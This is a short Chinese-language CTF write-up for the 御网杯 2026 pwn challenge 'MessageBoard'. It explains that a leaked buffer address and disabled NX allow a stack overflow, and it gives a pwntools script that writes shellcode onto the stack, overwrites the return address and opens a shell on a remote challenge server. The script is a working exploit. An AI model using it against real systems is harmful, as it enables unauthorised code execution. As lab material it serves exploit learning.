御网杯 PWN MessageBoard

171 字

1 分钟

2026-05-30

《御网杯PWN2026》

御网杯PWN2026

Pwn

Shellcode

Stack Overflow

附件：PWN-MessageBoard.docx

题目附件截图：

截图 1

题解记录：

已知 buf 的地址，而且没有 NX 保护，可以直接往栈上写入 shellcode，然后把返回地址改成 buf，跳转到栈顶执行。

原始 WP 中给出的 exp：

1
from pathlib import Path
2
from pwn import *
3

4
context(os="linux", terminal=["cmd.exe", "/c", "start"])
5

6
binary_path = str(Path(__file__).resolve().with_name("pwn"))
7
host = "47.99.147.34"  # 网址
8
port = 20056  # 端口
9

10
elf = ELF(binary_path, checksec=False)
11
context.binary = elf
12

13
if elf.bits == 64:
14
    context.arch = "amd64"
15
    gdbscript = """
16
    b *main
17
    c
18
    """
19
else:
20
    context.arch = "i386"
21
    gdbscript = """
22
    b *main
23
    c
24
    """
25

26
context.log_level = "debug"
27

28
if args.REMOTE:
29
    io = remote(host, port)
30
else:
31
    io = process(binary_path)
32

33

34
def p():
35
    pause()
36

37

38
io.recvuntil(b"Buffer at: ")
39
buf = int(io.recvline().strip(), 16)
40
log.info(f"buffer = {hex(buf)}")
41

42
shellcode = asm(shellcraft.sh())
43
payload = shellcode.ljust(0x80 + 0x8, b"A") + p64(buf)
44
io.send(payload)
45

46
io.interactive()